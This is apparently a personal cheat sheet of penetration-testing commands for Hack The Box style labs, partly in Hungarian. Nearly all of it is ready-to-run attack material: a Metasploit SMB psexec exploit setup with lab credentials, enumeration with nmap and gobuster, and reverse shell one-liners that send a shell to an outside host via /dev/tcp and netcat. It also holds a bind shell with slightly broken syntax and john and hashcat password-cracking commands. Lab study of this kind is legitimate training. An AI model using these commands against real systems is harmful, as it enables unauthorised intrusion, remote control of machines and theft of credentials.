BasicCommands

MSF SMB:

msfconsole
search exploit/windows/smb/psexec
use 0
set Rhosts 10.10.10.10
set LHOST 10.10.10.10
set LHOST 10.10.10.10
set SMBUser htb-student
set SMBPass HTB_@cademy_stdnt!
exploit

Alap parancsok: nmap:

nmap -sCV 10.10.10.10

Wget python

python3 -m http.server 8000

Dir gobuster

gobuster dir -u http://link.link -w /usr/share/seclists/Discovery/Web-Content/common.txt -o dev_linkvortex_htb_gobuster

Subdomain gobuster

gobuster vhost -u http://link.link -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -r -o linkvortex_subdomain_gobuster

reverseshell:

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
nc -lvnp 1234

bindshell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash i 2>&1|nc -lvp 1234 >/tmp/f

John:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Hashcat:

hashcat -m 0 -a 0 hash.txt rockyou.txt
nc 10.10.10.10 1234